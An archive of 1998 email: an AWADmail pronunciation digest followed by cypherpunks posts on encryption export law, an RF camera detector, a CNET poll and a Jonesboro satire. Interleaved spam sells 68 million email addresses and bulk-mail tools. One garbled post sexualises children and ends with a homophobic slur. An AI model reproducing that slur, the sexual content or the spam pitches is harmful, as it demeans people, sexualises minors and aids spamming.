>GHOTI = "fish"
>
>    Also noted by Marc J. Broering (dad@louisville.edu), Ted Schipper
>    (ted.schipper@utoronto.ca), (Tim Nelson) tsn@deakin.edu.au, Sheila
>    Crosby (sheila@ing.iac.es), Vimala Rodgers (vimala@iihs.com) and
>    martina@aol.com. -Anu
>
>------------------------------
>
>From: Derek Winkler (derek@aim-systems.on.ca)
>Subject: Ruminations & Ponderances
>
>It's funny that a couple of the words you're featuring for being pronounced
>differently than they are spelled have French origins. Being from Canada
and
>therefore being exposed to French, I look at the word and think "What do
you
>mean pronounced differently then they are spelled, how else would you
>pronounce oeuvre."
>
>------------------------------
>
>From: David Isaacson (isaacson@wmich.edu)
>Subject: Another Pronunciation for "chaos"
>
>One of the characters in Sean O'Casey's play, "Juno and the Paycock," (it's
>either Captain Jack Boyle or his sidekick "Joxer" Daly) regularly
>mispronounces this word as "chassis."
>
>------------------------------
>
>From: Fred Bartlett (fredb@springer-ny.com)
>Subject: Chaos
>
>When I traveled to the old Soviet Union to edit the proceedings of a
>conference on nonlinear dynamics, I was baffled by the (English) speech
>of my Russian colleagues. They kept talking about "House" -- that is,
>"chaos". It was all perfectly reasonable (though wrong, of course):
>transliteration to Cyrillic and then pronunciation as if it were Russian.
>
>------------------------------
>
>From: Steve Royster (roysters@sec.gov)
>Subject: Re: A.Word.A.Day--rendezvous
>
>I was willing to let oeuvre pass after I mistook it initially for the
French
>word for "egg."  I learned something on that one.  But isn't "rendezvous" a
>direct French import?
>
>    See next message. -Anu
>
>French, as the comedian Steve Martin has noted, is more torturous than
>English: "It's like those French have a different word for everything!"  On
>the album "A Wild and Crazy Guy," from early in his oeuvre, Martin
describes
>a man who dies trying to speak French.
>
>------------------------------
>
>From: Ken Maher (ken_maher@nhmbm1.dos.nortel.com)
>Subject: Re: A.Word.A.Day--chaos
>
>Your note on the need for pronunciation guidance in English reminds me of
>what I used to tell students when I taught English as a second language for
>ten years, mostly to native speakers of Spanish, Arabic, or Swahili.  All
>languages are thieves, but most languages have the good sense to hide what
>they've stolen by making it look like their own.  English, however, is more
>vain or, perhaps, careless, and often keeps the stolen goods in their
>original forms.  For example, when Spanish stole the word for driver from
>French, it changed the spelling to "chofer," whereas English kept it as
>"chauffeur."  This linguistic practice makes English one of the most
>difficult of the Latin-alphabet languages to learn to spell.
>
>    In polite company it is called borrowing.  Whether these
>    loanwords are ever returned is another matter.      -Anu
>
>------------------------------
>
>From: Bob Simmons (bsimmons@compassnet.com)
>Subject: (Mis)pronunciation Guide
>
>While I applaud your intention to include pronunciation in AWAD, I think
you
>should look for another source. Specifically, I have a problem with each of
>the last three days' pronunciations:
>
>oeuvre (oe-VRUH) -- since this one retains its French pronunciation, it is
>just about impossible to render in English.  When I say it, it sounds more
>like e(r)-vra (with neither syllable accented). The way you've written it,
I
>would say e(r)-VREW.
>
>segue (SAG-way) -- I have never heard this pronounced other than SEG-way
>
>rendezvous (RAN-day-voo) -- I would argue that RON-day-voo is closer.
>
>
>    While reducing a spoken sound to its written form is tough enough
>    in any language, it is nearly impossible to accurately represent
>    pronunciation information using only the lowest common denominator
>    of characters -- those found on a standard English keyboard. Not
>    all systems have the capability to show phonetic characters. (Once
>    Unicode is more widely adopted, it would be possible to show all
>    IPA characters but for now we have to do with the seven bit ASCII
>    character set).  It must also be noted that the pronunciation of
>    words varies a great deal from region to region and any single way
>    of pronouncing a word cannot be called the only correct one. In that
>    spirit, the pronunciation guide provided with the words here should
>    be taken as an approximation and not as a precise phonetic equivalent.
>
>    If you disagree with a given pronunciation or anything else in AWAD,
>    please drop me a line at anu@wordsmith.org.  Due to large volume of
>    messages, I can't always respond to you but I do read all
messages. -Anu
>
>...........................................................................
...
>Every other author may aspire to praise; the lexicographer can only hope to
>escape reproach. -Samuel Johnson
>
>To see previous issues of AWADmail, visit
www.wordsmith.org/awad/archives.html
>You can get them by email too.  Send a blank message to
wsmith@wordsmith.org
>with Subject line as: AWADmail nn, where nn is the issue number.  For
example,
>to get the first issue, make the subject line as: AWADmail 01 .
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Fri, 27 Mar 1998 04:37:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: anti-snoop RF detector
Message-ID: <v04010f07b140b9bc8d1d@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


Anyone have any info on this "Series Technology" company?

   dave

................................. cut here .................................
[ WhiteBoard News Excerpt: Wed 18 March 1998 ]

Taipei, Taiwan:

Taiwan's high-tech "peeping Toms" may have met their match in the form of a
pocket-sized device designed to detect pornographers' hidden cameras.

The "Discovery I" device, which resembles a pager, detects radio waves
emitted by the wireless remote-control cameras that criminal groups have
installed some hotel rooms, toilets and department store fitting rooms to
spy on unsuspecting patrons.

Pictures taken by such cameras of couples having sex or women trying on
garments are widely available in Taiwan's underground pornography market.

"Hopefully this device can give people more assurance when they are in
public establishments," said a representative for Series Technology, which
launched the detector Tuesday.

Several cases have come to light in Taiwan in recent weeks in which people
have bought pornographic videotapes, only to discover themselves as the
featured attraction.

Police are cracking down on the illegal practice, using far more
sophisticated scanners, and have made numerous arrests.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 26 Mar 1998 17:09:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Junger v. USA Notice
Message-ID: <199803270109.UAA12162@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


To: pr_list4@samsara.LAW.CWRU.Edu
Subject: Press Release
Date: Thu, 26 Mar 1998 15:37:38 -0500
From: "Peter D. Junger" <junger@samsara.LAW.CWRU.Edu>



			    Press Release


New Judge to Decide Whether Export Restrictions on Software Violate
   Constitutional Guarantees of Freedom of Speech and of the Press

Reply Briefs in Junger v. Daley Available on World Wide Web

	   Government Argues that Much Software is Harmful

   ----------------------------------------------------------------

	     Cleveland, Ohio, Tuesday, March 26, 1998
			For Immediate Release

            
		    For More Information Contact:
		    Peter D. Junger (216) 368-2535
		    <junger@samsara.law.cwru.edu>

		    Gino Scarselli (216) 291-8601
		    <gscarsel@mail.multiverse.com>


	Or see URL: http://samsara.law.cwru.edu/comp_law/jvc/
To be added to, or removed from, the list of those who were sent this
press release, please send e-mail to <lawsuit@upaya.multiverse.com>.

     _________________________________________________________________
   
Cleveland, Ohio, March 26 -- 

A status conference in the case of Junger v. Daley, the suit in which
a law professor at Case Western Reserve University in Cleveland, Ohio
seeks to enjoin the enforcement by the United States Department of
Commerce of the export regulations on encryption software, will be
held Friday, March 27, at 10:00 a.m. in the chambers of Federal
District Judge James S. Gwin in the federal courthouse in Akron,
Ohio.  The case turns on the issue of whether the publication in
electronic form of encryption software---software that is used to
preserve the privacy of electronic communications and data stored on a
computer---is entitled to protection under the First Amendment to the
United States Constitution.

Judge Gwin, a recent appointee to the federal bench who previously
served on the Ohio Court of Common Pleas, has replaced Judge Donald
C. Nugent as the judge responsible for the litigation. 

The plaintiff, Professor Peter Junger, who teaches a course in
Computing and the Law and who wishes to publish his class materials
containing some encryption programs on his World Wide Web server,
seeks an injunction against the enforcement by the defendant, Commerce
Secretary Daley, of the export regulations promulgated the Department
of Commerce that require anyone who wishes to publish encryption
software of the Internet or on the World Wide Web to first obtain a
license from the Bureau of Export Administration.

Both sides have filed for summary judgment.  Junger argues that the
freedoms of speech and of the press that are secured by the First
Amendment protect the writing and publication of computer programs.
The government, on the other hand, argues that computer programs are
not entitled to the protection of the First Amendment because they are
``functional''. 

Each side has filed a brief in support of its motion for summary
judgment.  These briefs and the complaint and motions for summary
judgment are available at <http://www.jya.com/pdj.htm> and
<http://samsara.law.cwru.edu/comp_law/jvd/>.  In addition both sides
have filed reply briefs that are now available at:


<http://www.jya.com/pdj6.htm>

<http://www.jya.com/pdj7.htm>

In his reply brief the plaintiff's lawyers argue:  ``Making software 
available on the Internet and the World Wide Web is publication of
that software, and publication in that medium is entitled to the
unqualified protection of the First Amendment.''

The government responds to this argument in its reply brief by
claiming that software is a ``functional item'' and thus not entitled
to protection as speech.  In furtherance of this claim it points out,
``Much software ... is designed to cause substantial harm,'' and that
``software can be used to invade privacy, commit fraud, and
substantially disrupt and endanger people's lives.''

``That is rather a perverse argument,'' says Junger, ``considering
that encryption software is used to protect against exactly the harms
that the government lists and that there is no law against the use of
encryption software, while, of course, there are laws against invading
privacy, committing fraud, and substantially disrupting and
endangering people's lives.  It is clear that the government does not
claim just the right to regulate the writing and publication of
encryption software.  It claims the right to forbid the writing and
publication of any type of computer program whatsoever without being
in any way restricted by the First Amendment.  There are, of course,
some types of speech, like obscenity, that the courts have held are
not entitled to the protection of the First Amendment, but no court
has ever subscribed to the government's remarkable theory that the
First Amendment does not protect functional speech.''

``My case,'' says Junger, ``is not just about the constitutionality of
the regulations forbidding the export of encryption software, though
that is an extremely important issue.  The real issue is whether the
First Amendment protects the writing and publication of any type of
computer program.''


				-30-






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "http://MusicBLVD.com/" <manager@musicblvd.com>
Date: Fri, 27 Mar 1998 10:33:01 -0800 (PST)
To: musicblvd@sparklist.com
Subject: Congratulations!
Message-ID: <3.0.32.19980326191942.007a1210@mail.sparknet.net>
MIME-Version: 1.0
Content-Type: text/plain


Congratulations!

Music Boulevard has been voted the Top Music Store on the web in a USA
Today readers poll*, and we owe our success to you!

As a loyal customer, please share in the celebration and take *** $10
DOLLARS *** OFF OF YOUR NEXT ORDER.

More big news:  Now, earn frequent flyer miles and get free shipping!  Just
buy three items or more on Music Boulevard.

Click Here to celebrate:

http://musicblvd.com/celebrate

Share this special offer with a friend!   Forward this to anyone you know
who hasn't yet experienced the best way to buy music online.

Again, many thanks for helping us become the Best Music Store on the web.


P.S. This offer is good only until March 31.  Don't miss out on the
celebration!  


*March 11, 1998

TO UNSUBSCRIBE: To unsubscribe from this mailing list, send an email to:
remove-musicblvd@sparklist.com and you will be automatically removed from
this list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nms123@usa.net
Date: Thu, 26 Mar 1998 19:47:02 -0800 (PST)
To: nms123@usa.net
Subject: !Accept Credit Cards! *When your Bank Says "NO" We Say "YES"
Message-ID: <199802045346.GAK09957@usa.net>
MIME-Version: 1.0
Content-Type: text/plain


ATTENTION ALL SMALL/HOME BUSINESSES NATIONWIDE: We are here to Help YOU!
                      Losing Sales?
                  !Accept Credit Cards! 
        *Internet Merchants*   *Home Base Business*
        *Mail Order Business*   *Start Up Business*
           *BAD CREDIT*              *NO CREDIT*

 Be able to honor: Visa, Master Card, American Express, Discover. This
service will establish your company as an authorized merchant to receive
payments from your customers who may use Credit Cards. Approval and Processing from your COMPUTER OR TERMINAL.

              *When your Bank Says "NO" We Say "YES"

 Also looking for a TRAFFIC BUILDER for your location?  we can set up: 

         "YOUR OWN ATM CASH MACHINE"  or  "A FREE ATM CASH MACHINE!"
in your location and you will be earning money on each transaction made in
the installed machine. The secret to bringing customers to your location
will be centered on the ability you may have to provide a unique service
of product that makes out of your place, a mandatory convenience stop. 

 We will be more than happy in assisting you in clarifying questions and
doubts about this business opportunity.

Double click here to e-mail us: mailto:jberrio@mail.datanet.com.mx

			jberrio@mail.datanet.com.mx 

And double-click here to visit our WEBSITE: http://www.vicom.net/nms/index.html

			http://www.vicom.net/nms/index.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. Zeus" <zeus@alt.net>
Date: Fri, 27 Mar 1998 07:24:42 -0800 (PST)
To: toto@sk.sympatico.ca
Subject: Re: Youwon'thave?To?Totokickaroundanymore...
In-Reply-To: <35170F43.2C65@sk.sympatico.ca>
Message-ID: <351BC489.3AC7@alt.net>
MIME-Version: 1.0
Content-Type: text/plain


Toto wrote:
> 
> sincethedeathofGomez,myunclehashadadrinkinhishandconstantly,exceptwhen
> hehasdroppeditonhiskeyboard,fuckingitupandmakingitdostrangethings,suchas
> nolongermakingspacesappearwhenhepressesthespacekey,whichisnormally
> calledsomethingelse,however,Ican'ttellyouwhatitscalled,sincethekeyusedtospell
> itdoesn'twork,either.
> (hint,veavsi&vutthead,vadvoy-vadvoy-whatcha-gonna-do,whatchagonnadowhen
> theycomeforyou?,iputthequestionmarkinvyhittingtherightenterkey...)
> tousetheshiftkeyIhavetotypeanextraletter,sincetheshiftkey,leftone,doesadelete-
> vackspacevevoreaddingtheshiftedcharacter.
> thedeathofgomez,whichhappenedwhenthe?N?S?A-?C?I?A?(therightshiftkey
> addsaquestionmarkveforeaddingtheshiftedcharacter)
> 
> writingthisislikewhatmyuncletellsmeavoutveingonlsd,hee-hee...
> couldsomeonesendthisto-villg-at-microsoft.com,please,sinceican't
> typeayou-know-what-inthecccolonfield?(iputthatquestionmarkinvyhitting
> the?keywithoutdoingashiftkey--also,ifiguredoutthatthe'v'key,youknowwhich
> oneimean,doesa'control-v',sinceittriestomakethecharacters'vold'wheni
> hititvymistake.
> andcoulddavesmithputthisonhissightasprologue-numverslash0.?(thenumver
> onekeydoesn'tworkeither,vuticanputaquestionmarkattheendofasentence
> andthenuseparenthesiswhilesavingakeystrokevecausethekeyvoardputs
> the?inautomaticallywheniusetherightshiftkey.
> itisreallyweirdtypingthisstuffwithakeyvoardthatdoesthingsthatarenotdone
> thewaythatmyvrainandfingersarewired.ivetthatificouldputspacesinthis,
> thateveryonewouldthinkthatjohnyoungwaswritingit.
> 
> anyway,ifanyofyouarereally,reallystoned,sostillreadingthisvecauseyou
> understanditanddon'tseeanythingoddavoutit,couldyoudoakeywordsearch
> inyahoomountaindeworsomeothersearchengineforaprogramthatletsa
> personcustomizethekeyvoardsothattheycanusedifferentkeystomakethe
> charactersthatdon'tworkonthiskeyvoard,andsenditvyemailto-toto-at-the
> addresswhereallthespamvullshitandcrapolatothecypherpunkslistcomes
> from?--iamaskingyoutodothisvecausehefuckedupmycomputer,2.
> myuncleisjustanoldvrokendowndrunkenasshole,vuticanfixhiscomputer
> ifigetakeyvoardcustomizingprogram,sothanksifyoucansendit.
> 
> ifsomeonecoulddothis,theniwouldpromisetoquitaskingthecypherpunks
> womeniftheyarewearingpanties--i'mlying,vuti'mjustakid...
> ok,vuticouldofferyouavlow-jovifyoudoit,fromoneofvianca'schild-girl
> apprentices,althoughtheywillkillmewhentheyreadthis...
> 
> ok,i'mgoingnow,vutihopesomeonewillsendmeaprogramthatwill
> helpmefixmyuncle'scomputer,evenifhewilluseittospamyourmailing
> listwithstuffthatyoushouldvelisteningto,exceptthathemakesitsothat
> youcan'tunderstandwhathe'ssayingunlessyoureallydoputacorkin
> yourassholesothatyoucanquitthinkinglikeasheeple.
> 
> thanks,
> humangus-peter
> ?(anotherguywhosendsyoushitthatyouwishpeoplewouldstopsending
> toyourmailinglist,eventhoughithinkyouguysarecool,eventhegrouchy
> onesliketimmayandthespookyguyslikekentcrispinwhowouldprovavly
> veacircleofeunuchsguyiftheyweren'twatchinghimsoclose--he'sstill
> alive,likedalethorn.?)
> isn'titcoolhowiautomaticallygetaquestionmarkveforetheparenthesis,and
> canmakeaquestionmarkwithoutusingtheshiftkey?
> pps-ifyoudon'tunderstandsemiotics,thentherearekidsinsaskatchewan
> whoaresmarterthanyou,evenifyouknowavoutplutoniumdecayratesand
> wheretheyellowwiregoes.
> i'llquitveforeyouthinki'mascrazyasmyuncle.
> ppps-i'malwaysaskingpeoplewhopostfrom?A?(h?)?O?Liftheyarewearing
> panties,vuttheydon'tgetthejoke,andi'mnotsurethatido,either,vuti'mgoing
> tokeepondoingit.
> pppps-anarchistusedeltekeys,they'reimmortalcypherpunks...

Attilla is a faggot cocksucker...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 27 Mar 1998 11:27:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Fwd: 10 Laws the Net Needs - Article/Survey
Message-ID: <3.0.5.32.19980327112541.0094a6d0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sigh.  Another control freak concerned about the anarchy of the Net
is doing a survey.  Voting is still open, and I'd encourage you to
go see the mix of opinions of the 8000 or so current voters
and add your own.

------- Forwarded Message Follows -------
From:
http://www.cnet.com/Content/Features/Dlife/Laws10/index.html


10 Laws the Net Needs
CNet Features

               By Susan Stellin
               (3/23/98)

               When the U.S. Congress passed the
               Communications Decency Act in 1995, Net
               activists staged a collective revolt. Protestors set up
               anti-CDA Web pages, launched campaigns to stop Net
               censorship, and hit the streets to voice their
               opposition.

               When the Supreme Court struck down the CDA,
               many online activists breathed a sigh of relief.
               But as it turns out, that law was just a preview of
               things to come.

               This year, there are more than 50 bills before
               Congress that propose some kind of Internet
               regulation. And policymakers from China to the
               European Union have been equally busy.

               Like it or not, this genie's been let out of the
               bottle; Net laws are on the way. So as the saying
               goes, if you can't beat 'em, join 'em.

               We've taken the lead on this one and drafted ten
               of our own Internet laws: proposals dealing with
               real issues like the proliferation of spam, the
               invasion of online privacy, and yes, the too-easy
               access to pornography. Some of our ideas match
               bills Congress is already considering; others
               address problems that Washington hasn't thought
               of yet.

               Brazen? You bet. In fact, not everyone at CNET
               agrees with all of these proposals--and you may
               not either.

               So we've decided to put them up for a vote.
               We've paired each law with an electronic ballot
               box. So exercise your (virtual) right to vote, and let
               us know how on-track--or off-base--our ideas are.

               The polls are open...



               Susan Stellin is an executive editor at CNET. The
               ideas expressed in this article are her own and do not
               necessarily reflect the opinions of CNET: The Computer
               Network or its executives, board of directors, TV
               hosts, public relations department, yadda yadda yadda.
               Susan's mom, however, agrees with everything in here.


For the full article and voting see:

http://www.cnet.com/Content/Features/Dlife/Laws10/index.html


--------------------------
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Debt Collectors <search@peoplefinders.net>
Date: Fri, 27 Mar 1998 13:03:36 -0800 (PST)
To: <search@peoplefinders.net>
Subject: GOOD NEWS ABOUT BAD ACCOUNTS
Message-ID: <199803272103.NAA28543@toad.com>
MIME-Version: 1.0
Content-Type: text/plain




PROFESSIONAL, EFFECTIVE DEBT COLLECTION SERVICES 
AVAILABLE

For the last fourteen years, National Credit Systems, Inc. has been 
providing top flight debt collection services to over 9,000 businesses, 
institutions, and healthcare providers.

We charge only a low-flat fee (less than $20) per account, and all 
proceeds are forwarded to you directly -- not to your collections agency.

If you wish, we will report unpaid accounts to Experian (formerly TRW), 
TRANSUNION, and Equifax. There is no charge for this important 
service.

PLEASE LET US KNOW IF WE CAN BE OF SERVICE TO YOU.

Simply reply with the following instructions in the "Subject" field:

REMOVE  --  Please remove me from your mailing list.
EMAIL   --  Please email more information.
FAX     --  Please fax more information.
MAIL    --  Please snailmail more information.
CALL    --  Please have a representative call.

Indicate the best time to telephone and any necessary addresses and 
telephone/fax numbers in the text of your reply.

If you prefer you can always telephone us during normal business hours 
at (212) 213-3000 Ext 1467.

Thank you.



P.S. -- If you are not in need of our services at this time, please retain this 
message for future use or past it on to a friend. Thank you.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wowcom@ctia.org
Date: Fri, 27 Mar 1998 12:57:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: WOW-COM Registration
Message-ID: <0ee7b5057131b38MAIL@uunt.net>
MIME-Version: 1.0
Content-Type: text/plain




Dear cypherpunks:

	Welcome to WOW-COM(TM), the Internet home page for wireless industry professionals.  You join thousands who enjoy free access to the wireless marketplace, up-to-the-minute industry news, analysis and opinions from industry leaders, career opportunities, and research from CTIA and other experts.

	When you visit WOW-COM(TM) in the future, you should arrive at the red WOW-COM(TM) professional page.  If your computer sends you to the blue consumer page, please use the site's e-mail system to contact us, and we will assist you.  
	
	We look forward you your continued participation in our on-line wireless community.

Sincerely,

The WOW-COM(TM) Team

Mailto:wowcom@ctia.org
http://www.wow-com.com









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Fri, 27 Mar 1998 21:05:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: GRAND JURY: Jonesboro Guilty, Society and Christianity Indicted As Co-conspirators
Message-ID: <351C9E6E.FF00180C@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


[Bienfait Nutly News:] A GRAND JURY CONVENING DURING HAPPY HOUR
at the CoalDust Saloon took to heart the Arkansas Govenor's statement
that,
"We need to lay the blame for the Jonesboro tragedy squarely at the feet
of
the culture that breeds this kind of response in a child."

The Grand Jury forebroad noted that the child perpetrators had neither
been
to Hollywood, nor to any art gallerys funded by the National Foundation
for
the Arts against the wishes of various 'Family Values' coalitions.

 "It's pretty clear that these murderous young monsters are an end
result of
the cultural influences they were exposed to in the course of being
brought
up in the community of Jonesboro. Accordingly we have returned an
unasked-
for verdict of 'guilty' against the citizens of that community, and have
indicted
two others who we feel acted as co-conspirators in this tragedy."

The Grand Jury released two beer-stained items of evidence that they had

used in their drunken deliberations:

* "Road Rage" gets the attention, but more rages are coming into
prominence:  Pre-pay Rage, Albuquerque, N.Mex., January (a man
wanted to pump his gas before he paid; fired several gunshots into
the clerk's car).  Late-Fee Rage, McLean, Va., January (former
State Dept. lawyer was not allowed to rent a movie until he settled
an old late fee; ran down the store owner with his car, knocking
him through the window of a nearby restaurant).  Rain Rage, Los
Angeles, February (as two men passed in the rain, their umbrellas
accidentally touched; one man then aimed his umbrella at the
other's face and thrust the tip through his eye, piercing his brain,
sending him to the hospital in critical condition).
~WEIRDNUZ.526 (News of the Weird, March 6, 1998) by Chuck Shepherd

* According to a September federal indictment in Des Moines,
Iowa, Kenneth Ray Bruner (who is the stepson of a Pentacostal
minister in Oklahoma City) led his seven accomplices in prayer
three weeks earlier, asking for God's protection just before they set
out to knock off Hermans Fine Jewelry.  Bruner acknowledged,
according to the indictment, "that they were going to do bad things
but that they were not bad people."  No one was hurt in the
robbery, and everyone was behind bars by the following day.
 ~WEIRDNUZ.526 (News of the Weird, March 6, 1998) by Chuck Shepherd

"If these were aberrations," the forebroad slurred, wiping drool off the
corner
of her chin and slapping the hand of President Clinton, who had passed
out
in the bar the evening before and stayed over for the trial, "that would
be one
thing, but these examples are just the tip of the iceberg."
"It has been obvious for quite some time that both society and
Christianity
are way out of control, and there is no telling how much greater the
damage
they cause would be if these two entities were able to operate without
the
calming influence of gun-bearing paramilitarists, who can only be pushed
so
far before they begin to push back, themselves."

The Grand Jury's released statement went fairly easy on the parents of
the
child warriors, pointing out that, from the moment of their birth, they
became
the SSN-registered property of the government, with the majority of
their
upbringing being controled by the many laws regulating the manner and
nature of education and discipline that their parents are
allowed/required to
provide for them.
"Had the parents taken a strong hand in the discipline and direction of
their
children's education, they would have been vulnerable to prosecution for
a
variety of serious offenses, and it is likely the government would have
revoked the parents' possession of the child-property in question.
"As well, most members of the community of Jonesboro, the surrounding
social community, and the Christian community, would have undoubtedly
used every available law and law enforcement agency at their fingertips
to prevent the parents from helping their children to escape beyond the
reach of 'We the Sheeple.'"

A barmaid with a Rose Tattoo on her butt nodded in agreement as this
portion of the Grand Jury's statement was read.
The woman had fled Jonesboro the day before the shootings with her own
son, having kidnapped him from a Child Services detention center, where
he was placed after a Christian neighbor had turned her in for allowing
him
to view her live-in boyfriend's Playboy magazines.
"I feel kind of guilty for leaving other people's children behind, to
suffer the
consequences of living in such a dangerous community, but I'm already
facing one count of kidnapping..."

An informal tribunal of drunks and drug addicts returning from the
restrooms
questioned the Grand Jury's failure to indict the government.
One gentleman paused from wiping foreign substances off of his shoes, to

ask, "Since the government is the chief instigator and enforcer in the
process
of crushing the spirit of children, providing funding for most of the
boxes that
their free spirits are crammed into, as well as hunting down and putting
in
more secure boxes those who attempt to evade their responsibility to
remain
within the boundaries set aside to contain their number..."
"Drawing outside the lines!" someone shouted.
Nodding agreement, the gentleman continued, "...then surely they should
have
not only been indicted, as well, and found guilty, but they should have
received
the same penalty as those who backed the actions of the Waco murderers,
according to the guidelines of the McVeigh Convention, as passed by
the Mulatohma Citizen's Tribunal presided over by Judge Bell."

"Well, we did return a few *secret* indictments," the forebroad grinned,
with
a wink to the gentleman, "but we're waiting for TruthMonger to figure
out
where the 'yellow wire' goes..."

In the efforts of fairness, so not to be seen as engaging in yet another
round
of all-too-common Suburbian Christian bashing, the Grand Jury also
released
evidence that communities and religions far distanced from Jonesboro
should
think twice  before gloating over "the anal-retentives finally getting
theirs,"
as a dark-skinned, slant-eyed member of an obscure religious cult
was heard to say, before suddenly dying of alcohol poisoning, whereupon
his soul went up on the roof and the bartender dialed 911, asking them
to
send an ambulance and a Frisbeetarian Priest:

* Dubious Salvations:  In January in Jerusalem, self-described
mystic rabbi David Batzri offered specialized blessings in person
or by telephone for those who have sinned by masturbation (which
he said is the principal cause of demons).  And in Hong Kong in
November, self-proclaimed "knight of God" Syed Atta
Muhammad, 32, was committed to a psychiatric center after he
assaulted a 22-year-old tour guide, whose breasts he thought were
too big to serve God because they made her look like a prostitute.
 ~WEIRDNUZ.526 (News of the Weird, March 6, 1998) by Chuck Shepherd







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: GILLILIGAN <GILLILIGAN@aol.com>
Date: Fri, 27 Mar 1998 20:34:53 -0800 (PST)
Subject: Hi im Sandra
Message-ID: <2175a0eb.351c7db6@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: GILLILIGAN@aol.com
Subject: Hi im Sandra
From: GILLILIGAN <GILLILIGAN@aol.com>
Date: Fri, 27 Mar 1998 23:22:59 EST
Organization: AOL (http://www.aol.com)

hi my name is Sandra i am an 18 year old model from Italy..Me and my friends
made a webpage with our pictures on it...tell me if im pretty..

<A HREF="http://www.angelfire.com/nj/iconz/index.html">Click here to see our
pictures</A>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Fri, 27 Mar 1998 16:21:19 -0800 (PST)
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: Fwd: 10 Laws the Net Needs - Article/Survey
In-Reply-To: <3.0.5.32.19980327112541.0094a6d0@popd.ix.netcom.com>
Message-ID: <Pine.BSF.3.96.980328013808.17611A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Mar 1998, Bill Stewart wrote:

> Sigh.  Another control freak concerned about the anarchy of the Net
> is doing a survey.  Voting is still open, and I'd encourage you to
> go see the mix of opinions of the 8000 or so current voters
> and add your own.
> 
> ------- Forwarded Message Follows -------
> From:
> http://www.cnet.com/Content/Features/Dlife/Laws10/index.html

Predictably, the vast majority of those participating in the poll favor
statist solutions over freedom. Which of course holds true for the
population at large.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: siowie5@msn.com (Electric Email)
Date: Sat, 28 Mar 1998 04:39:28 -0800 (PST)
To: siowie5@msn.com
Subject: 68 Million Email Addresses - $99
Message-ID: <199803284186MAA45175@post.compuform.com>
MIME-Version: 1.0
Content-Type: text/plain


          68 MILLION
 EMAIL ADDRESSES
 FOR ONLY $99 
       

 You want to make some money? 

 I can put you in touch with over 60 million people at virtualy no cost.

 Can you make one cent from each of theses names?

If you can you have a profit of over $600,000.00 

This offer is not for everyone. 

If you can not see the just how excellent the
 risk / reward ratio in this offer is then there is nothing I can do for you. 

To make money you must stop dreaming and TAKE ACTION.


****************************************

PACKAGE  A

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!

$99.00

****************************************

PACKAGE B

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!       AND

15 Different Bulk email programs 

and tools  to help with your mailings

and list managment.

$ 139.00

****************************************

PACKAGE  C

THE WORKS

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!       AND

15 Different Bulk email programs 

and tools  to help with your mailings

and list managment.

             AND 

Over 500 diferent Business Reports

now being sold on the internet for up to

$100 each. You get full rights to resell these reports.

With this package you get the email addresses, 

the software to mail them AND ready to sell  information products.

AND ...... 

. a collection of the 100 best money making

adds currently floating around on the internet.

$ 189

****************************************

SEVERAL WAYS TO ORDER !!!

IF YOU ORDER BY PHONE WE WILL SHIP YOUR CD CONTAINING THE 68 MILLION + NAMES WITHIN 12 HOURS OF YOUR ORDER!!!

 
  1) WE ACCEPT:  AMERICAN EXPRESS OR
    
                               VISA <> MASTERCARD
 
     TYPE OF CARD  AMX / VISA / MC??_______________

      EXPIRATION DATE   ___________________________
 
     NAME ON CREDIT CARD________________________
 
     CREDIT CARD #________________________________
 
     BILLING ADDRESS ____________________________
 
     CITY_________________________________________
 
    STATE________________ZIP_____________________
 
   PHONE INCLUDE AREA CODE___________________
   
    EMAIL ADDRESS______________________________ 

        WE WILL BILL selected amount to your account plus the following shipping costs

        SHIPPING  COST OF 3.85 FIRST CLASS MAIL

        SHIPPING COST OF  15.00  24 HOUR EXPRESS MAIL /  FEDERAL EXPRESS
 
        SALES TAX (7.25%) added to CA residents 
 
  >>> Send correct amount in cash, check or money

order to:

  >>> ELECTRIC EMAIL
  >>> 702 Mangrove Avenue, Suite 151
  >>> Chico, CA 95926


  2) Send the same above requested credit card 

information to above address. 


   3) Fax the same above credit card information to 530-895-

8470

   4) Call phone # 530-876-4291.  This is a 24 hour phone 

number to place a CREDIT CARD order.

   5) FAX A COPY of your signed check to 530-895-8470.

       This is an EXCELLENT way to order without a credit card!



Electric Email is a private company and is not affiliated with, or endorsed by, AOL, MSN, or any other Internet Service Provider.

Copyright 1998

All rights reserved

